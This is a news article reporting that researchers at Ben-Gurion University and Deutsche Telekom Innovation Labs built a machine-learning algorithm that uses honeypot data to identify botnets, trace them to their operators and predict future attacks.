Algorithm developed to predict future botnet attacks

Six botnets have been discovered and traced back to their perpetrators by an algorithm produced by researchers at Israel’s Ben-Gurion University (BGU) of the Negev. The scientists who built the formula say it will allow law enforcement to trace administrators responsible for future attacks.

The key to the work is analysing data produced by previous attacks, the cybersecurity researchers say.

Malicious botnets are groups of Internet-connected computers that have been secretly compromised to forward traffic to other computers. Payloads can include spam and viruses. The PCs can become remote controlled and also proffer private information.

Spam and viruses

While the effect on the local machine can often be identified on the infected machines themselves, the botnets have been difficult to trace, the researchers say.

“Using botnets, hackers and cybercriminals can carry out powerful attacks that, until now, were largely untraceable,” an article on the university’s website says.

The new algorithm first identifies the botnet and then allows it to be traced, according to the scientists at Deutsche Telekom Innovation Labs at BGU.

How they did it

The team had access to a wealth of honeypot data collected by one of the largest telcos in the world, Deutsche Telekom.

Through machine learning and analysis of that honeypot data, “they built a breakthrough program that identifies the botnet by finding similar attack patterns,” BGU claims.

A honeypot is a way of baiting the botnet and then collecting intelligence about it. It was that data the team had access to. Once you’ve identified the botnet and its source, you can go after the administrators, the scientists think.

Six botnets

The team reckons they found six botnets. But not only that, they think that they can now tell if an attack came from a genuine person or from a robot.

And they say that they can “predict future attacks,” BGU says.

“This is the first time such a comprehensive study has been carried out and returned with unique findings,” Dudu Mimran, CTO of Deutsche Telekom Innovation Labs at BGU, said in the article.

The team made their announcement at Israel Defence’s CyberTech 2016 event. Incidentally, it was the same event where Israeli Prime Minister Benjamin Netanyahu expressed an interest in the country strengthening its global role in cybersecurity.

How many?

Possibly half a billion computers around the world have been infected by botnets, the Deutsche Telekom Innovation Lab’s web site estimates. It also costs the world’s economy $100 billion (€89 billion) a year, the lab says.

But, generally, detecting the server that controls the botnet is “next to impossible,” the Times of Israel says in an article about the BGU algorithm.

How are they hiding?

Fake IP addresses and made-up domain names are among the methods the hackers use to mask their location, the online newspaper explains.

“While computer security experts have had some success tracking down the controllers of the botnets, there are probably dozens that remain ‘in the wild’ for each one taken down,” says the story.

“The annoying ‘zombie armies of the Internet’ may have met their match,” the article suggests.

IDG News Service